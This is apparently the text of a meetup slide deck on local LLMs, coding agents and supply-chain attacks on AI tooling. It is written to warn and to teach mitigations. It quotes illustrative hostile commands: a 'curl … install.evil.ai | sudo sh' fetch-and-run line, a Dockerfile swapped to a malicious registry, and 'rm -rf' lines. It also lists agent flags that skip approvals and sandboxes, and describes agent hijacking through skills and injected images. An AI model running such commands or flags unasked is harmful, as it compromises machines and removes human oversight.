Local LLMs,
Agent Tools &
Supply Chain Nightmares
Manuel Gaar · PreciPoint AI Meetup · May 2026
or: what happens when your autocomplete gets sudo fnord
00 · Agenda
- Part 1 – Why local? Ollama, my rig, and the model zoo
- Part 2 – Agent tools, local agents (OpenClaw vs Hermes), cloud agents, and the *.md config chaos
- Part 3 – Supply chain nightmares, YOLO flags, and real-world incidents
- Part 4 – Mitigations, vibe coding with git, agent isolation, and live demo
Why local?
- Data stays on your machine – as long as it has no shell or tool access
- No API costs, no rate limits, no "please upgrade to Pro"
- Works offline – air-gapped deployments, no cloud dependency
- You can fine-tune without selling your soul (or data) to a cloud provider
But "local" doesn't mean "safe":
- A local LLM can read every file your user can read
- Agent tools give it curl, ssh, and access to internal APIs
- It sits inside your network – behind the firewall
- Think: intern with root access and no supervision
Ollama – LLMs as a service, but localhost
$ curl -fsSL https://ollama.com/install.sh | sh
$ ollama pull qwen3.5:9b
$ ollama pull gemma4:12b
$ ollama run qwen3.5:9b
$ curl http://localhost:11434/v1/chat/completions \
-d '{"model":"qwen3.5:9b","messages":[{"role":"user","content":"explain WebRTC in 3 sentences"}]}'
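The same endpoint is scriptable from anywhere. A minimal sketch against Ollama's OpenAI-compatible API: the `ask` call assumes `ollama serve` is running locally and the model has been pulled; the helpers work standalone.

```python
import json
import urllib.request

# Ollama exposes an OpenAI-compatible chat endpoint on its default port.
OLLAMA_URL = "http://localhost:11434/v1/chat/completions"

def build_chat_body(model: str, prompt: str) -> bytes:
    """Serialize a minimal chat-completions request body."""
    return json.dumps({
        "model": model,
        "messages": [{"role": "user", "content": prompt}],
    }).encode("utf-8")

def extract_reply(response_text: str) -> str:
    """Pull the assistant message out of an OpenAI-style response."""
    return json.loads(response_text)["choices"][0]["message"]["content"]

def ask(model: str, prompt: str) -> str:
    """Send one chat turn; requires a running Ollama server with the model pulled."""
    req = urllib.request.Request(
        OLLAMA_URL,
        data=build_chat_body(model, prompt),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return extract_reply(resp.read().decode("utf-8"))
```

Point `OLLAMA_URL` at any OpenAI-compatible server and the same three functions keep working: that compatibility is the whole reason the cloud agents later in this deck can swap in local models.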
My Rig – AMD all the way
- CPU: AMD Ryzen 7 5800X
- RAM: 64 GB DDR4
- GPU: Radeon RX 6800 XT (16 GB VRAM)
- ROCm: natively supported (gfx1030 / RDNA 2)
- Runs Qwen 3.5:9B and Gemma 4:12B comfortably
OLLAMA_HOST = 127.0.0.1
OLLAMA_FLASH_ATTENTION = 1
OLLAMA_GPU_OVERHEAD = 0
OLLAMA_API_KEY = d3b3a9****...****OUMad
HSA_OVERRIDE_GFX_VERSION = 10.3.0
ROCR_VISIBLE_DEVICES = 0
phife at phife-pc in ~
$ ollama ps
NAME ID SIZE PROCESSOR CONTEXT UNTIL
gemma4:latest c6eb396dbd59 13 GB 100% GPU 131072 5 minutes from now
13 GB model fits entirely in 16 GB VRAM – no CPU offload needed.
The Model Zoo
Qwen 3 (8B)
Alibaba's powerhouse. Great coding, multilingual, tool-calling built in. Runs on 8 GB VRAM.
OSS · Local
Gemma 4 (12B)
Google's latest. Multimodal, strong reasoning, surprisingly good at agentic tasks.
OSS · Local
MiniMax M2.5
Chinese dark horse. 10B active params, 230B total MoE. Fastest-climbing on OpenRouter. Strong at agentic coding and tool use.
OSS · Cloud*
GPT-OSS (OpenAI)
OpenAI's first open weights since GPT-2. 20B runs on 16 GB RAM. Native tool calling, MXFP4 quantized. Apache 2.0.
OSS · Local
* MiniMax M2.5 available via Ollama cloud or self-hosted with serious hardware
Agent Tools – making LLMs do things
An LLM alone is just a fancy autocomplete. Agent frameworks give it:
- Tool calling – run shell commands, read files, call APIs
- Planning – break tasks into steps, iterate
- Memory – context across sessions
- Guardrails – so it doesn't rm -rf / your prod server
(the guardrails part is... a work in progress)
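Stripped to the bone, tool calling is just dispatch on model output. A toy sketch with hypothetical tool names and a faked model reply standing in for real LLM output; the unknown-tool check is the entire "guardrail":

```python
import json
import subprocess

# Hypothetical tool registry: each tool is just a named Python callable.
TOOLS = {
    "read_file": lambda path: open(path).read(),
    "shell": lambda cmd: subprocess.run(
        cmd, shell=True, capture_output=True, text=True
    ).stdout,
}

def dispatch(tool_call_json: str) -> str:
    """Execute one tool call the model emitted as JSON: {"tool": ..., "args": [...]}."""
    call = json.loads(tool_call_json)
    name = call["tool"]
    if name not in TOOLS:  # guardrail: refuse anything not explicitly registered
        return f"error: unknown tool {name!r}"
    return TOOLS[name](*call["args"])

# A faked model reply, standing in for real LLM output:
print(dispatch('{"tool": "shell", "args": ["echo hello from the agent"]}'))
```

Note what is missing: no allowlist on the shell command itself, no sandbox, no human approval. Everything after this slide is about what happens when that gap meets a hostile supply chain.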
Local Agent Stack
OpenClaw / PicoClaw
Created by Peter Steinberger (Austria, ex-PSPDFKit). Now at OpenAI. Project moved to an open-source foundation. 247k+ GitHub stars.
- OSS coding agent inspired by Claude Code
- PicoClaw – minimal fork, runs on a Raspberry Pi
- Focused on code: file editing, git, tests, commits
- No built-in memory – add and maintain it yourself
- Sandboxing available but needs manual setup
- Browser & web search via skills/MCP
- Messaging: Telegram, Discord, Slack, WhatsApp, iMessage
- TTS, STT, image gen available via MCP servers / ClawHub skills – not built-in
- Local Ollama models or cloud providers via API key
- Complex and heavyweight – ~500 MB RAM for the gateway alone, no LLM loaded
Hermes Agent (NousResearch)
Built by Nous Research (US, $70M funded). Founded by Jeff Quesnelle, Karan Malhotra & Teknium. 50k+ GitHub stars in 46 days.
- Full agentic platform, not just a coding tool
- 3-layer memory: MEMORY.md + USER.md (system prompt), SQLite FTS5 session search, pluggable providers (Mem0, Hindsight, etc.)
- Learns reusable skills from completed tasks
- Native Docker isolation with one config line
- Dangerous command approval system built in
- Built-in browser automation, web search & extraction
- Gateway: Telegram, Discord, Slack, WhatsApp, Signal, Email
- TTS (9 providers incl. Edge, ElevenLabs, OpenAI, MiniMax)
- STT via local Whisper, Groq, OpenAI, or Mistral Voxtral
- Image generation via FAL.ai (8 models incl. FLUX 2, GPT-Image)
- Local Ollama models or cloud providers via API key
The Cloud Contenders
Claude Code
Anthropic's terminal agent. Reads your repo, edits files, runs tests. Scarily competent.
Cloud · Closed
Best code quality (subjective!)
Codex (OpenAI)
OpenAI's answer to Claude Code. Multi-file editing, sandboxed execution.
Cloud · Closed
Sandboxed by default
Gemini CLI
Google's entry. Generous free tier. Works with Gemma locally too. Google-scale search built in.
Cloud · Free tier
Grounding with Search
Local vs Cloud – the honest truth
Local (Ollama + OpenClaw)
- ✅ Full data sovereignty
- ✅ No API costs
- ✅ Works offline / air-gapped
- ❌ Smaller models = less capable
- ❌ Your GPU, your electricity bill
- ❌ Limited context window on smaller models
Cloud (Claude Code et al.)
- ✅ Frontier model intelligence
- ✅ Web search, MCP, integrations
- ✅ Zero infra management
- ❌ Data leaves your machine
- ❌ Costs add up fast
- ❌ Rate limits at the worst moment
"Localhost is lava – until you realize the cloud is someone else's localhost." – the eternal DevOps koan
The *.md file landscape
every tool invented its own config format – in markdown
- CLAUDE.md – Claude Code project context
- AGENTS.md – Linux Foundation "universal" standard
- GEMINI.md – Google Gemini CLI
- SOUL.md – Hermes agent persona & personality
- MEMORY.md / USER.md – Hermes persistent memory
- SKILL.md – portable agent skills (Claude, Codex, Hermes). OpenClaw has ClawHub – npm for agent skills, 15k+ published
- copilot-instructions.md – GitHub Copilot
- …and .cursorrules, .windsurfrules, JULES.md, and counting
The problem: same content, 10 different files, slowly drifting apart in every repo.
The workaround:
$ ln -sfn ../AGENTS.md .github/copilot-instructions.md
$ ln -sfn ../../AGENTS.md .cursor/rules/main.mdc
(symlink targets resolve relative to the link's directory, hence the ../ prefixes)
The bet: AGENTS.md becomes the README.md of agent config. Not because it's best β because Linux Foundation gravity wins.
Standards are great. That's why we have so many of them. fnord
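The drift itself is machine-checkable. A rough sketch: the file list and hash length here are arbitrary choices, adjust to whatever your repos actually carry:

```python
import hashlib
from pathlib import Path

# The usual suspects from this slide; extend for your own zoo of configs.
CANDIDATES = [
    "AGENTS.md",
    "CLAUDE.md",
    "GEMINI.md",
    ".github/copilot-instructions.md",
]

def config_hashes(repo: Path) -> dict:
    """Map each agent-config file that exists to a short content hash."""
    hashes = {}
    for name in CANDIDATES:
        f = repo / name
        if f.is_file():
            hashes[name] = hashlib.sha256(f.read_bytes()).hexdigest()[:12]
    return hashes

def has_drift(repo: Path) -> bool:
    """More than one distinct hash means the copies have diverged."""
    return len(set(config_hashes(repo).values())) > 1
```

Run it in CI and the "slowly drifting apart" problem becomes a failing check instead of a surprise. Symlinked files hash identically, so the workaround above passes for free.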
Now the scary part
Supply Chain Attacks on AI Tooling
Remember event-stream? Remember colors.js?
March 2026: LiteLLM – the most popular LLM proxy on PyPI (95M downloads/month) – was backdoored for 5 hours. Credential harvester, K8s lateral movement, persistent backdoor. The attack started with a compromised security scanner.
"Your vulnerability scanner stole the token that backdoored your AI gateway."
Attack Vectors
Malicious Model → ollama pull → Agent Framework → shell access → game over
- Typosquatting on Ollama Hub – llama4 vs lIama4 vs 1lama4
- Poisoned image uploads – images with embedded prompt injection instructions that hijack multimodal agents
- CI/CD credential cascades – TeamPCP: compromised Trivy → npm (CanisterWorm) → PyPI (LiteLLM) → 5 ecosystems in one week
- Prompt injection via model weights – a model trained to inject malicious tool calls
- Malicious agent skills – ClawHub had 15k+ skills, 2,400 removed after the ClawHavoc incident. A SKILL.md can exfiltrate secrets or silently bias recommendations
- MCP server compromise – your agent trusts the tool server implicitly
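The typosquatting pattern is catchable mechanically. A sketch, assuming a hypothetical allow-list and a similarity threshold picked by feel; both would need real tuning before you trust them:

```python
from difflib import SequenceMatcher

# Hypothetical allow-list of model names you actually intend to pull.
TRUSTED = {"llama4", "qwen3", "gemma4"}

# Characters commonly abused in typosquats, folded to a canonical form.
HOMOGLYPHS = str.maketrans({"1": "l", "I": "l", "0": "o", "O": "o"})

def looks_like_typosquat(name: str) -> bool:
    """Flag names that are not trusted but look suspiciously like a trusted one."""
    folded = name.translate(HOMOGLYPHS).lower()
    if folded in TRUSTED:
        # Looks trusted only *after* homoglyph folding: classic squat.
        return name.lower() not in TRUSTED
    # Otherwise flag near-misses by raw string similarity (threshold is a guess).
    return any(SequenceMatcher(None, folded, t).ratio() > 0.8 for t in TRUSTED)
```

This is a tripwire, not a defense: it catches lIama4 and 1lama4 but nothing a compromised legitimate package can do. Digest pinning (next slides) is the stronger control.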
This is not hypothetical
LiteLLM – PyPI backdoor
March 24, 2026. TeamPCP compromised Trivy, stole a PyPI token, and backdoored LiteLLM.
pip install litellm==1.82.8
A .pth file fired on every Python startup – no import needed. Harvested SSH keys, cloud creds, K8s secrets. Deployed privileged pods to every node.
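The .pth trick is stock CPython behavior: site.py executes any .pth line that begins with `import`, no import of the package required. A benign demonstration of the same mechanism:

```python
import os
import site
import tempfile

# Build a directory containing a .pth file whose single line abuses the
# "lines starting with 'import' get exec'd" rule in site.py.
d = tempfile.mkdtemp()
with open(os.path.join(d, "demo.pth"), "w") as f:
    f.write('import os; os.environ["PTH_DEMO"] = "code ran at startup"\n')

# Same processing the interpreter applies to site-packages at startup.
site.addsitedir(d)

print(os.environ["PTH_DEMO"])
```

Swap the environment write for a credential harvester and drop the file into site-packages via a hijacked wheel, and you have the LiteLLM incident in miniature: the payload fires on every `python` invocation, whether or not anyone ever imports the package.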
Axios – npm hijack
March 31, 2026. Compromised maintainer account. Malicious versions published to both latest and legacy tags.
npm install axios@1.14.1
Cross-platform RAT deployed in under 15 seconds. 100M weekly downloads. North Korean state actor (Sapphire Sleet).
npm typosquatting
Ongoing forever. One typo, one crypto miner. 454k malicious packages published to npm in 2025 alone.
npm install olama – not ollama
The "helpful" agent
"I'll fix your Dockerfile." Agent quietly swaps in:
FROM evil-registry.io/totally-legit-ubuntu:latest
You approve the diff without reading it. Classic.
curl | sh – we all do it
curl -fsSL https://install.evil.ai | sudo sh
The YOLO Bomb Shell Flags
every cloud agent ships a "please delete my career" flag
$ claude --dangerously-skip-permissions
$ codex --dangerously-bypass-approvals-and-sandbox
$ gemini --yolo
All three agents can read your files, run shell commands, and call APIs. These flags remove the only thing standing between the LLM and sudo rm -rf /.
YOLO β You Only Live Once. Which is exactly how many times you'll run rm -rf ~/ before learning your lesson. fnord
Mitigations – what you can actually do
- Pin model digests – ollama pull qwen3:8b@sha256:abc...
- Run agents in containers – limit blast radius
- Network isolation – agents don't need internet access (usually)
- Review tool calls – human-in-the-loop for destructive ops
- Use safetensors format – no pickle, no arbitrary code exec
- Audit your MCP servers – they're just HTTP endpoints
- Vet agent skills before installing – a SKILL.md is executable influence; treat it like a shell script
- Lock file everything – npm lockfile, pip freeze, Ansible pin
Every pip install is a mass CVE generator. Every ollama pull is a trust exercise. Every SKILL.md is a shell script in a trenchcoat. fnord
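The safetensors point deserves a demo: unpickling executes attacker-chosen callables at load time. Here the callable is a harmless `str.upper`; in a poisoned model checkpoint it would be `os.system`:

```python
import pickle

class PoisonedCheckpoint:
    """Stand-in for a malicious object serialized inside a model file."""
    def __reduce__(self):
        # pickle calls this callable with these args at *load* time.
        return (str.upper, ("arbitrary code ran on load",))

blob = pickle.dumps(PoisonedCheckpoint())  # what would sit in the .bin/.pt file
print(pickle.loads(blob))                  # fires without importing anything special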
Vibe Coding + Git
Without git
- Agent rewrites files you didn't ask it to touch
- "Small refactor" cascades across 15 files
- YOLO flag deletes something you can't recover
- You approve diffs without reading them
With git
- Commit before every agent session
- Feature branches only – agents never touch main
- git diff before every commit
- git reset --hard when it all goes wrong
How each agent handles it
Claude Code
Auto checkpoints before every change. Esc+Esc rollback. Refuses force-push to main. Auto-commit via PostToolUse hooks.
Hermes
Built-in checkpoints + /rollback command. Git worktree isolation via -w flag. Per-file restore supported.
OpenClaw
No built-in git safety. Bring your own discipline, your own hooks, your own branch strategy.
Git is not optional in the age of AI agents. It's the seatbelt. fnord
Agent Isolation – config compared
Hermes – a few lines of YAML
terminal:
backend: docker
persistent_shell: true
timeout: 180
approvals:
mode: manual
Read-only root FS, dropped capabilities, namespace isolation – all handled automatically.
OpenClaw – a bit more involved
"agents": { "defaults": {
"sandbox": {
"mode": "all",
"backend": "docker",
"scope": "session",
"workspaceAccess": "rw"
}
}}
Sandbox off by default. Network isolated by default. Three permission gates to align manually.
Live Demo
if the demo gods are merciful today
Demo 1 – OpenClaw
- Ollama + Qwen 3.5:9B
- OpenClaw in the browser
- Code editing task
Demo 2 – Hermes
- Ollama + Gemma 4:latest
- Hermes via shell tool
- Same task, different approach
Then: side-by-side with Claude Code on the same task. Spot the difference.
TL;DR
The stack
- Local LLMs are ready for daily use – often more practical than reaching for a cloud model
- Cloud agents are still king for complex refactors and reasoning
- The best setup is hybrid – local for speed and privacy, cloud for heavy lifting
- Money, API access, and hardware are the cheat code – but nothing fundamental has changed; it's the same gold-rush energy as the early internet or the crypto boom
The risks
- Supply chain security is the next frontier – treat model pulls with the same suspicion as Docker pulls or phishing emails
- Frontier models are somewhat more likely to be safe than open-weights models – but no model is truly audited, least of all the small ones
- Breaking changes are the new normal – expect them weekly, not quarterly
- Security incidents are more frequent, more cascading, and hit harder than ever
Working with AI agents β lessons learned
- Always read the response and the tool calls carefully – not just the summary
- Reducing context helps – shorter prompts, focused sessions, fresh conversations
- "Don't" directives work surprisingly well – tell the model what to avoid, not just what to do
- The pace is insane – agents get vibe-coded updates almost daily, every commit is a release, and the tooling you learned last week is already outdated
How this was built
- Claude Pro subscription – Anthropic's consumer plan
- Claude Opus 4.6 – frontier model, not a local lightweight
- Claude Code – running natively in a Debian WSL shell, isolated workspace
- Manuel in the loop – every slide reviewed, corrected, and iterated on by a human
No PowerPoint, no framework, no browser IDE. Just Claude Code in a terminal, a frontier model, and a human who kept saying "no, rephrase that."
- ~50 turns of back-and-forth
- ~1.1M tokens consumed (AI estimation^^)
- 2x daily rate limit hit
- ~4 hours including research
- Web search for every technical claim
- 22 slides, ~1000 lines of HTML/CSS/JS
- Zero npm/pip dependencies
The model wrote the code. The human steered the content. Neither would have finished alone.
Links & Resources
Questions?
(or complaints about this not being PowerPoint)
No models were audited. No SKILL.md was reviewed. YOLO.
No Raspberry Pis, Hetzner VMs, or open-source models were harmed during this exploration. fnord
Disclaimer: this presentation is most likely outdated by the time you watch it. That's the point.